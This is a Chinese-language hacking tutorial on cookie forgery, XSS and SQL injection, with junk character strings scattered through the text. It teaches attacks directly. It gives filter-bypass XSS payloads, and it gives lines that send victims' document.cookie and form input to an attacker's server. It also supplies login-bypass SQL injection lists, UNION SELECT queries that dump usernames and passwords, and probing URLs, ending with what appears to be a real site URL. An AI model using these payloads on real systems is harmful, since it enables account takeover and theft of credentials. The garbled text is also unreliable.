XSS & SQL注入

admin

XSS & SQL注入
文章作者：CyberPhreak
* u' i' j) a& B/ b! A译文作者：黯魂 [S.S.T]
+ u& b- t& x! E

/ n. r: X; _7 S- ?- ], xXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
9 d0 u  u- y9 P* a, {X Web Security - XSS & more X
" l7 Q0 N& K5 D  t) G8 Z0 W: Q% mXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


/ r& T7 }9 k' }8 N1 }/ ^2 s: u0 b~介绍

  g; k$ G& m0 x1 C; Y/ C9 \在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.
! E2 q# v& X$ _
% H4 b& t" z+ W" l' BXXXXXXXXXXXXXXXXXXXXX
9 o% j$ V4 v  [; k5 T9 j  KX Table OF Contents X
: S- C6 H* c4 ~XXXXXXXXXXXXXXXXXXXXX
3 d' a& F( h1 T6 j2 V+ N+ l
! r3 O5 [1 A# t# ~2 pXXXXXXXXXXXXXXXXXXXX
X Cookie Editing X
/ f% s+ `9 A% h! hX XSS X
7 |/ I9 |: X+ p3 Y8 u$ QX SQL Injection X
$ }7 g1 j* n9 B  RXXXXXXXXXXXXXXXXXXXX
3 T, D2 D# B- h6 U9 [
  {# `+ B. d2 g: _/ j- Z0 O~什么是cookie

" p6 n4 a. W8 O  m' wcookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.

8 g9 v) c# h, Q% E! M0 n- ?~警告&欺骗
& e9 B8 I0 C% p4 d! R
那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:
, c, c/ Y8 K3 _
- h' `6 X$ p& Z! \$ _% d5 Wstrusername=cnsst;strpassword=cnsst
- l3 v4 e1 `6 g0 h* y5 q1 ^/ _
此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
% ?8 Q& j; j* T1 l( m! R现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...
1 K( Q: h: A: D
~什么是XSS

3 N7 q9 B6 b) |- j( F# i1 pXSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.
0 ]; @4 W: z9 u& L: m* y
~为什么使用XSS

9 ^# m* s8 V% t. F3 V" e很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
, W2 P6 D) [2 l4 ?你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.
6 v. a" H: C! m+ G+ z
/ n) }& M5 J" W~让我们开始吧…

7 b% W0 W; N. @- @我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.
0 n5 R* h7 H9 B; W& L$ n  W
XSS--跨站脚本&lt;html&gt;
, P& ]) z: X: D7 ^7 s, s
&lt;body&gt;

&lt;form action="" method="GET"&gt;

* `  k9 i: z9 y* K; g6 L&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;

% W3 w' ~- D: A# z# EScript: &lt;input name="name" type="name"&gt;
$ v& g% J3 F7 f% ]9 i3 l, ~
&lt;input type="submit" value="submit"&gt;

4 Z. N8 V5 S0 U; e/ r&lt;/form&gt;
1 s; m/ @$ B* g' `% m, Y
5 c. S+ U: g. `% A' u&lt;/body&gt;
" ~; h9 r: C4 e5 E. J$ `3 O! C
) p$ O- W* v) Q# W&lt;/html&gt;

& z* _, {7 H' t
2 O5 L, J8 a& G4 {, |3 V
&lt;?php
: `% c' ]* h/ z2 E1 }4 {* T8 [
8 p- u# ]9 ^# K( V; n6 m$name = $_GET['name'];
. \% ~1 J6 @6 H; s- C- R4 n) s- o
echo("Hello $name");

?&gt;
% u  h: h1 H" l. M9 I1 ?( D# |, o2 L( @复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:
! g, u) N9 K5 h: n# v: L
cnsst
/ }0 G% v7 T! h"Hello cnsst!"

引号内的信息就是输出信息..注意看,现在我输入:
<script>alert(document.cookie)</script>
9 u. s- }! F2 s' k- B; k
- t; U1 h( [0 W2 [+ B: V3 e" u4 ^2 ]那么它将会弹出document.cookie!所以它是易受XSS攻击的!
; C" [- N1 O% j, J, R) A2 P
8 ]# p* d6 j, ~现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...
# p% t* w( y* D/ C9 @  s# S1 E& J, t$ w
服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...
* u( r6 V+ \9 T0 @5 R9 \
0 X% `2 f# g3 k+ W5 S4 s& n+ d: i已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.
4 B) n, V  I. v# [2 D
; A4 H# y( y$ Y) u8 p% ~7 f让我们看一个稍微复杂点的例子!
9 R. K" E. ~! B# ~7 T* F, X# b
假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
scriptalert(document.cookie)/script
/ T8 o; r' ]( M8 P或者可能是这样的:
scriptalertdocument.cookie/script

- N4 t( Q; _! S" W! u) M可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.
/ N3 e! ]2 e9 X0 V$ V% \
2 D3 l9 o3 @2 Z* J  H& {让我们继续利用:
* C. y9 F9 F$ ~" s/ v<<script>>alert(document.cookie)<</script>>
$ T; @/ n8 D9 `- `9 w: N! v6 I
" n! f" E% I0 G. C6 g你的输出将弹出document.cookie.

: o  z) ?$ k+ e6 x: a, F/ b; e现在来看看更狠的:
<<script>>alert((document.cookie))<<//script>>
- J' B4 F7 X" W+ R; m

他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
0 @" z* D# D+ F" v# E. lscriptalertdocument.cookie/script
" H( }! [/ h' X) F3 k. {或者 <<<script>>>alert(document.cookie)<<</script>>>  
" f2 ]1 c% R1 Q$ t
他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
1 g/ @1 b' G! H' k  `<script>alert(document.cookie)</script>

. e+ W9 n0 |/ K4 L' Z+ w输出像这样:srplert(document.cookie)srp

9 G; Y- z: T* j9 l1 z2 e仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

! r& J4 ~! z1 r% s; @3 Y所有重复多余的部分刚好被替换!现在让我们来点更高级的!
( P$ c9 S' z2 d  n" b  x# t
, F' T5 q8 w  r, `这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
( M2 c6 ?& v5 {2 e9 Q, ~( q<script>alert(document.cookie)</script>
* k% F( Y2 `9 J
' `6 A* f6 f* I7 O输出将是:
1 ~5 ~/ X% h6 y+ r3 sscriptalert(document.cookie)script

3 g+ |% k3 T# X9 K3 D看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
8 y6 R; T" M" s4 j2 S7 B<<script>>alert(document.cookie)<</script>>

输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:
6 ]1 f4 ?; D  o
6 X) V" D- t2 L3 x: w<
3 t) @; {& H1 fscript
>
alert
(
( t9 `! J/ V! A, u( k3 ^document
.
4 N. E: v; f  ?; m4 B+ H5 gcookie
)
<
( J8 q; Y6 f4 m# j) i: H# A2 A/
script
>
# D5 e) T# ?. L

看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
3 p8 c' l, i0 Z<
+ H9 ?2 d! V- P# ^& k! s* u3 H! P' Q( es
- O+ m1 u# Z: X; {  B, {c
/ b- |) v5 _1 `" Ar
* n: U' u. V; K1 X# r' j. O! N# di
p
6 i( H+ {2 E0 D" St
6 f. D2 @5 t1 q0 E>
& ^$ R/ ?2 M; W9 P7 R0 {/ {4 i4 ra
' V6 o4 H0 }* z( ]  hl
e
; ?- B! i; d; B) \9 Qr
t
$ R* h/ |, `8 J- P(
d
o
% ]0 g! T3 A. K5 ?. W6 h" P; mc
u
m
, @! M7 K$ X$ P3 ?1 re
, v; g6 I$ ?9 t  b7 mn
t
.
c
6 z- d" y/ ?1 e* k8 D: no
) k& e# h& M2 U  e  v2 m1 @, y8 }o
k
i
e
)
' t$ g4 z! a; N' Z<
& N, I) D) [" \; S) W" _9 e/
2 ^" h) F2 h6 z" [- d& L- [2 os
2 r7 A; ]2 u) `: X2 I+ R+ H; ~c
r
$ E7 h' Z; A3 y' ^) _i
p
& r) r2 S- ?/ d- a) xt
/
* [8 y7 a  \  f' z- T>
0 |* z0 b. q% \0 I6 b* i; ]
: \  C! n7 T# T, a这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)
! R3 j/ ~8 Y) M4 G
还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.

, m, |. w# q& `现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.
8 I' U- v! \0 v! q
! @. `9 J9 J! c) C7 K$ ?8 x& M首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.
- x4 B9 L+ r/ c2 V: V( I
- E: d2 _$ y  A我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
document.forms(0).action ="http://myserver/myscript.php
8 i$ x; W! |% ?6 S- c% ^这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.

再次假设你在网站上注册了一个帐号,并且可以自定义资料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
+ Q& A7 s( D) v8 L7 y$ ]或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
, T- i4 I0 i3 L. g$ Ojavascript:location.href="http://myserver/cookie.php"+document.cookie
8 P: E8 D$ }: D! y! j( F' G这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.

! p6 S% \# x: P0 D( l- l3 j有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
9 _5 B* z( l+ U& h8 Stelnet example.com
) K; Y( E: l( O7 G+ y4 IGET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
! M7 Y. A& q& L( ?' T8 |User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
) q2 k9 I8 H' [! e: l- F9 NReferer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
/ i! Y: f8 O; B: N6 k~什么是SQL注入
! x: I. ?: Z& J% x- f* ]
) a: O+ u9 w$ o6 t5 bSQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;

&lt;body&gt;
! D6 k# V2 ^# h' \" u2 z
&lt;form action="" method="POST"&gt;

) M) Y, x' K. o+ S1 E) _, i3 SUsername: &lt;input name="name" type="name"&gt;
+ P7 u, B- s# D
Password: &lt;input name="password" type="password"&gt;
! Y+ Q/ b2 Y; x3 S
& R* y' X, J! l- u" n1 ^) ?1 Z&lt;input type="submit" type="submit" value="Submit"&gt;

&lt;/form&gt;
- z% Z1 z/ h& k3 R0 S
' ^) S6 m1 Y1 u9 \0 ]# I&lt;/body&gt;

&lt;/html&gt;
复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!
; @* z2 W* ?+ ?& ^9 I
最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

# E  i- ^* K- @& K1 E'='
'OR 1=1--
'OR a=a--
'OR'

4 p& d+ d: x3 B9 s7 K0 B: d' n8 ~自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:

& u8 |, q: j$ d1 u  G2 o'OR''='
6 t9 I, C4 ^+ V. f9 r7 C'OR"="
: V% D9 N% I% j9 Q0 |: z'OR'="
0 [0 n  q3 P  j$ I'OR '="
'OR "='
'OR ''='
# W1 {6 j3 d% |) Y, ^0 R$ R'OR '=''
'OR "=''
'OR ''="


+ p" f- s0 Q7 }2 m9 v% \. Y~
现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
0 M7 S! u( N3 q# o# L* aUNION ALL SELECT username,password FROM users

. ~5 \7 U6 I9 S. w" @这个查询语句将执行,但是….如果毫无作用呢?
1 f  S# r, q3 Z& ]UNION ALL SELECT username,password FROM users WHERE username='OR "='
2 ]8 I* p5 ^. H1 SAND password='OR "='
$ I$ w0 y& D+ q$ Q& Z; y
你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

5 U- i4 D" H3 e% G. \一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
- Z5 g3 O2 V$ C7 ZUNION ALL SELECT
& @7 X5 |! s2 g5 q; wip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
9 x  u: `, N; o' r6 _9 H3 Y, hWHERE ip='OR''="
, ]+ M( P1 @6 t
现在你看到这个了吗?(我确信你已经看到了)
http://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
2 ]! E- G1 v" x+ K' G: ~& j1 ghttp://example.com/index.php?article='
- }. e: P5 b( F6 S7 L% T

7 _6 V* v8 l( k: K# ^/ E8 w现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
http://example.com/index.php?article='
http://example.com/index.php?article='='
2 |) O. X+ h1 q8 t7 V( xhttp://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
+ a3 w( W: M9 R4 e4 e$ E+ |6 \http://example.com/index.php?article='OR '=''
# E5 |  f. Y) i  x4 Ohttp://example.com/index.php?article='OR''='
5 N2 I3 a; o1 u# J7 b$ ?# Fhttp://example.com/index.php?article='OR"'='
3 U/ n' \; M( n$ _* z) {- _6 nhttp://example.com/index.php?article='OR"''='

尽情发挥自己的创造力!
+ h. |' V9 M: s$ O8 Ghttp://www.ie.tsinghua.edu.cn/notice/show.php?id=704